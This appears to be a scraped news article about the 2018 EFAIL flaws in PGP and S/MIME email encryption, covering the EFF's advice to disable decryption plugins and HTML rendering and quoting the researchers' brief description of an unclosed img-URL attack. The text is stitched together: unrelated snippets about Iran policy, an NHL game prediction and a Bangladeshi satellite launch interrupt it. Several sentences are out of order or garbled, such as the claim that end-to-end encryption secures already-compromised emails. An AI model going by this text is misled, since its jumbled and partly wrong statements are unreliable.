Experts have warned of the danger to encrypt emails

Helen Aguilar
May 14, 2018

More details are to be published by the researchers on May 15 who recommend not using the two encryption tools until they are fixed. And until the flaws get resolved, they recommend that everyone disable any tools that decrypt PGP emails by default.

Matthew Green, a professor of cryptography at Johns Hopkins University in Baltimore, tells Süddeutsche Zeitung that he's reviewed the researchers' work.

In the wake of the new research, Green tells Süddeutsche Zeitung: "This is another bullet hole in an already perforated auto".

More details to come.

Schinzel and his team's research has been corroborated by Electronic Frontier Foundation (EFF), and has been described in detail by the researchers in a paper published earlier today.

If you've been using PGP or S/MIME to securely send and receive sensitive emails, you'll want to stop using them right away, as a group of European researchers have found vulnerabilities in both standards.

"Cybersecurity experts were still assessing the scope of the threat Monday morning, and the EFF called the safety measures a "[temporary, conservative stopgap] until the immediate risk of the exploit has passed and been mitigated against by the wider community". Their advice for mitigating the vulnerability's impact is to stop encrypting or decrypting emails directly in affected email clients and to disable HTML rendering.

Trump gambles on different path to rein in Iran's nuclear ambitions
Michael Rubin, an Iran expert at the American Enterprise Institute, said the USA invasion of Iraq under George W. And Iranian mullahs and their jackboots in the Iranian Revolutionary Guard Corps, all flush with American cash .

Vegas Golden Knights vs. Winnipeg Jets Free Prediction 5/12/18
Just how far they go will depend largely on the pads of goalie Marc-Andre Fleury, a three-time Stanley Cup victor with Pittsburgh. The team has been forced to stave off opponent power plays a whopping 14.8 minutes per game over their last five outings.

Ground gets signals from Bangabandhu-1
SpaceX , however, confirmed that the Falcon 9 Block 5 rocket and its payload are in good condition, which is great news to hear. It is the first Bangladeshi communications satellite put into space by SpaceX .

But some think the vulnerability warning is overblown. Service providers have been requested by the EFF to communicate the news to all users and request them to disable all related security plugins including Thunderbird with Enigmail, Apple mail with GPG tools, Outlook with GPG4win.

Koch says some MUAs' failure to block hidden HTML links are the problem. According to the researchers behind the discovery, attacks could be executed in one of two ways.

"Don't use HTML mails". That's because EFAIL can be stopped by using authenticated encryption; OpenPGP started to support authenticated encryption in 2001.

End-to-end encryption is used specifically to secure emails that have been compromised in those manners. CounterMail, Hushmail and Mailfence all use OpenPGP.

"In the most straightforward example of our attacks, the adversary prepares a plaintext email structure that contains an img element, whose URL is not closed with quotes", the researchers wrote.

In their paper, researchers noted that "while it is necessary to change the OpenPGP and S/MIME standards to fix these vulnerabilities, some clients had even more severe implementation flaws allowing straightforward exfiltration of the plaintext".

Other reports by

Discuss This Article

FOLLOW OUR NEWSPAPER